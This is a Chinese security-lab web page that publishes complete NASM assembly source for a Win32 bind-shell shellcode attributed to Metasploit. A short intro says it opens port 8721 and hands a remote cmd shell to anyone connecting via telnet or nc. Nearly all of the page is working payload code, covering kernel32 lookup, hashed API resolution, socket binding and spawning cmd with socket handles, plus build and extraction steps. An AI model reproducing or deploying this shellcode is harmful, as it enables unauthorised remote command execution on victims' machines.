Asm Win32 Bind Command Shell - ShellCode - Nuclear'Atk（核攻击）网络安全实验室

Asm，Cmd Shell，Win32 Bind Command Shell ShellCode：

Asm，Cmd Shell，Win32 Bind Command Shell ShellCode，本地绑定 Cmd Shell 的 ShellCode。说通俗点就是，本地开一个端口，然后你用“Telnet IP Port”或者“nc -vv IP:Port”连接上以后，就直接是一个远程 Cmd 权限了，远程执行 Cmd 命令。这个就能理解了吧，很多人都玩过。

;标题: Win32 Bind Shell
;平台: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
;功能: 监听连接并产生Command Shell
;作者: hdm[at]metasploit.com
;编译: nasm -f bin -o win32_bind.bin win32_bind.asm

;ShellCode提取：编译生成的 win32_bind.bin 的十六进制数值即 ShellCode

[BITS 32]

global _start

_start:

LCaller:
call LLoadFunctions

LDataSegment:
;========================

dd "CMD"

dd 0x79c679e7 ; closesocket             12
dd 0x498649e5 ; accept                  16
dd 0xe92eada4 ; listen                  20
dd 0xc7701aa4 ; bind                    24
dd 0xadf509d9 ; WSASocketA              28
dd 0x3bfcedcb ; WSAStartup              32

dd 0xec0e4e8e ; LoadLibraryA            36
dd 0x60e0ceef ; ExitThread              40
dd 0xce05d9ad ; WaitForSingleObject     44
dd 0x16b3fe72 ; CreateProcessA          48

db "WS2_32.DLL", 0x00, 0x01
;========================

LLoadFunctions:
    pop ebx
    push esp
mov ebp, esp
    mov [ebp], ebx

LKernel32Base:
    push byte 0x30
    pop ecx
    mov eax, [fs:ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x1c]
lodsd
mov ebx, [eax + 0x08]
    jmp short LStartLoading

LLoadWinsock:
    lea edx, [edi + 44] ; 获取 ws2_32.dll 地址
    push ecx            ; 保存计数器
    push edx            ; 压入 ws2_32.dll 地址
    call eax            ; LoadLibraryA()
    mov ebx, eax        ; 保存模块句柄
    pop ecx             ; 恢复计数器
    jmp short Looper2

LStartLoading:
    ; 开始装载地址 ebp + 12
    push byte 0x08
    pop esi
    add esi, ebp

    ; 计数器功能
    push byte 0x0a
    pop ecx
    mov edi, [ebp]

Looper:
    cmp cl, 0x06
    je short LLoadWinsock

Looper2:
    push ecx                    ; 保存计数器
    push ebx                    ; dll 句柄
    push dword [edi + ecx*4]    ; hash 函数值
    call LGetProcAddress        ; 查找地址
    pop ecx                     ; 恢复计数器
    mov [esi + ecx * 4], eax    ; 堆栈段存放的地址
    loop Looper
xor edi, edi

LWSAStartup:
; WSAStartup(0x101, DATA)
sub sp, 400
push esp
push 0x101
call [ebp + 32]

LWSASocketA:
; WSASocketA(2,1,0,0,0,0)
push edi
push edi
push edi
push edi
inc edi
push edi
inc edi
push edi
call [ebp + 28]
mov ebx, eax                ; 保存接口到 ebx
    xor edi, edi

LBind:
push edi
push edi
push dword 0x11220002 ; 端口 8721
mov esi, esp
push byte 0x10        ; 长度
push esi
push ebx
call [ebp + 24]

LListen:
push edi
push ebx
call [ebp + 20]

LAccept:
push edi
push esi
push ebx
call [ebp + 16]
mov edx, eax

LCreateProcessStructs:
; 为 STARTUPINFO, PROCESS_INFORMATION 分配空间
sub sp, 0x54

; zero out SI/PI
lea edi, [esp]
xor eax, eax
    push byte 21
    pop ecx

LBZero:
rep stosd

    mov edi, edx
mov byte [esp + 16], 68 ; si.cb = sizeof(si)
inc byte [esp + 61] ; si.dwFlags = 0x100

; 接口句柄
mov [esp + 16 + 56], edi
mov [esp + 16 + 60], edi
mov [esp + 16 + 64], edi

lea eax, [esp + 16] ; si
push esp   ; pi
push eax
push ecx
push ecx
push ecx

    inc ecx
push ecx
    dec ecx

push ecx
push ecx
push dword [ebp]
push ecx

LCreateProcess:
call [ebp + 48]
mov ecx, esp

LWaitForSingleObject:
    push 0xFFFFFFFF
    push dword [ecx]
    call [ebp + 44]

LCloseSocket:
push edi
call [ebp + 12]

LFinished:
    call [ebp + 40]

LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp

LFnlp:

jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld

LHshlp:

xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp

LFnd:

cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone

LNtfnd:
xor eax, eax

LDone:
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
ret 8

文章目录